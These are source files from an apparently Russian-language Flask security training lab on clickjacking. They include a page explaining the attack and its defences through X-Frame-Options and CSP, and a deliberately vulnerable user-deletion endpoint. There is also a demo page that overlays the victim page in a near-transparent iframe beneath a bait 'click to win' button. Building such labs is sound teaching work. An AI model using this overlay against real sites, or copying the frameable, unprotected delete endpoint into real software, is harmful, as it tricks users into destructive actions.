app/task4/blueprint.py
from flask import Blueprint, render_template, request, redirect, url_for, jsonify
from flask_security import login_required, current_user
import models 
from app import db, user_datastore
from sqlalchemy import text
from .forms import UserForm


task4 = Blueprint('task4', __name__, template_folder='templates')

@task4.route('/task4')
@login_required
def index():
    username = current_user.email
    if request.headers.get('X-Requested-With') == 'XMLHttpRequest':
        return jsonify({'username': username})
    return render_template('task4/index.html')


@task4.route('/task4_delete', methods=['POST'])
@login_required
def delete_user():
    username = request.get_json().get('username')
    users = models.User.query.filter(models.User.email==username).first()
    db.session.delete(users)
    db.session.commit()
    return jsonify({'result': 'Ok'}), 200


@task4.route('/task4_create', methods=['POST'])
@login_required
def create_user():
    user_input = request.get_json()
    form = UserForm(data=user_input)
    if form.validate():
        users = user_datastore.create_user(email=form.email.data, password=form.password.data)
        db.session.commit()
        return jsonify({'result': 'Ok'}), 200
    return redirect(url_for('task4.index')) 


@task4.route('/task4_test')
@login_required
def index2():
    return render_template('task4/index2.html')

  




   

   






    

app/task4/templates/task4/index.html
{%extends 'base.html'%}

{%block title%}
 Корпоративная сеть
{%endblock%}

{%block main%}
<section class="about">
    <div class="container">
        <div class="row">
            <div class="col-12">
                <h2 class="text-center text-uppercase color1 mb-5">Описание уязвимости Clickjacking</h2>
            </div>
        </div>
        <div class="row">
            <div class="col-lg-12">
                <p>Clickjacking, также известный как "UI redressing" или "User Interface (UI) deception" (обман пользовательского интерфейса), представляет собой вид веб-атаки, в которой злоумышленник скрывает или маскирует подставную интерактивную область на веб-странице, заставляя пользователя неосознанно щелкнуть на этой области вместо того, чтобы нажимать на то, что он думает, что нажимает.</p>
                <p>Простым примером может быть создание прозрачного слоя поверх некоторого привлекательного контента или кнопки. Пользователь думает, что щелкает на кнопку или интересный элемент, но на самом деле он щелкает на скрытую подложку, которая может выполнить опасное действие без его ведома. Например, эта атака может быть использована для обмана пользователя и получения его разрешения на отправку конфиденциальной информации, нажатия на опасные ссылки или совершения финансовых транзакций.</p>
                <p>Одним из способов предотвращения clickjacking является применение заголовков HTTP, таких как <b>X-Frame-Options</b>, которые сообщают браузеру не разрешать отображение страницы внутри фрейма или iframe на другом сайте. Заголовок <b>Content-Security-Policy (CSP)</b> также может использоваться для защиты от clickjacking, позволяя веб-сайтам определить правила, контролирующие, как и где их контент может быть загружен.</p>
                <p>Также советуется использовать аккуратные и проверенные дизайнерские элементы, которые не оставляют места для скрытых областей на странице. Это включает размещение контента, такого как кнопки, формы или ссылки, таким образом, чтобы было невозможно легко подложить элемент поверх них.</p>
                <p>Как пользователь, вам следует быть осторожным при нажатии на ссылки или кнопки на незнакомых или ненадежных веб-сайтах. Браузеры также предоставляют средства защиты от clickjacking и других атак. Убедитесь, что ваш браузер обновлен до последней версии и включены все необходимые меры безопасности.</p>
                <p>Clickjacking может быть довольно опасным и может использоваться для кражи конфиденциальных данных или выполнения других криминальных действий. Поэтому как разработчикам, так и пользователям важно обращать внимание на безопасность веб-приложений и браузеров.</p>
            </div>
        </div>
        <div class="row">
            <div class="col-lg-12">
                <div style="text-align: center;">
                    <img src="{{ url_for('static', filename='img/02.png') }}" width="800" height="500" style="display: inline-block;">
                </div>
            </div>
        </div>
    </div>
</section>


<section>
    <div class="container" id="app4">
        <div class="row">
            <div class="col-12">
                <h2 class="text-center text-uppercase color1 mb-5">Пример уязвимости Clickjacking</h2>
            </div>
        </div>
        <div class="row">
            <div class="col-12">
                <pre>
                    <code style="background-color: #eee;">
                        <span class="keyword">Ниже приведен код для реализации уязвимости Clickjacking  </span>
                        <span class="comment">-------------------------------------------</span>
                        <span class="keyword">&lt;iframe&gt; (Inline Frame) - это HTML-элемент, который используется для вставки веб-страницы или другого документа
                        внутри текущего документа. Он позволяет встраивать веб-контент, такой как другие веб-страницы, видео, карты и т.д., 
                        прямо в вашу страницу.</span>
                        <span class="comment">-------------------------------------------</span>
                        <span class="keyword">Мы создадим другую страницу с завлекающим контентом, а в &lt;iframe&gt; укажем ссылку на нашу страницу <b>URI=/test4</b></span>
                        <span class="keyword">Ниже представлен код "обманной" страницы</span>
                        <span class="comment">-------------------------------------------</span>
                        <span class="string">&lt;iframe <b>src="http://10.10.102.119:81/task4"</b>&lt;/iframe&gt; <span class="comment">// в iframe указана ссылка на страницу жертву</span>
                        &lt;button&gt;<span class="keyword">Click to Win</span>&lt;/button&gt;</span> <span class="comment">// обманная кнопка, реализующая удаление пользователя</span>
                        <span class="comment">-------------------------------------------</span>
                        <span class="keyword">Нажмите на кнопку, чтобы посмотреть как реализуется код выше. 
                        Уточнение - в этом коде не представлены стили css, которые реализуют прозрачность страницы</span>
                        <span class="comment">-------------------------------------------</span>
                        <a href="{{url_for('task4.index2')}}">Пример</a>
                        <span class="comment">-------------------------------------------</span>
                         
                    </code>
                </pre>
            </div>
        </div>
        <div class="row">
            <div class="col-12">
                <h4>Вы авторизаваны как пользователь - { tasks.username }</h4>
            </div>
            <div class="col-lg-6">
                <div class = "card-search">
                    <h5 class="text-center">Для удаленияя текущего пользователя нажмите кнопку</h5>
                    <button class="action-button" type ="submit" @click="deleteTask(tasks)">Удалить</button>
                </div>
            </div>
            <div class="col-lg-6">
                <div class = "card-search">
                    <h4 class="text-center">Добавить пользователя</h4>
                    <form class="card-form" @submit.prevent="createTask">
                        <div class = "input">
                            <input type="text" class="input-field" v-model="user.email">
                            <label class = "input-label">Login</label>
                        </div>
                        <div class = "input">
                            <input type="text" class="input-field" v-model="user.password">
                            <label class = "input-label" for="">Password</label>
                        </div>
                        <div class="action">
                            <button class="action-button" type="submit">Добавить</button>
                        </div>    
                    </form>
                </div>
            </div>
        </div>
        <div class="row"></div>
    </div>
</section>
<script src="{{url_for('static', filename='js/app4.js')}}"></script>
{%endblock%}

app/task4/templates/task4/index2.html
<style>
    iframe {
        position: relative;
        width: 1440;
        height: 2527;
        opacity: 0.1;
        z-index: 2;
    }
    button {
        position: absolute;
        top: 1840;
        left: 375;
        z-index: 1;
    }
    img {
        position: absolute;
        top: 700;
        left: 375;
        z-index: 1;
    }
    h1 {
        position: absolute;
        top: 1700;
        left: 375;
        z-index: 1;
    }
</style>
<img src="{{ url_for('static', filename='img/03.png') }}">
<iframe src="http://10.10.102.119:81/task4"></iframe>
<h1>Нажми на кнопку чтобы выграть!</h1>
<button>Click</button>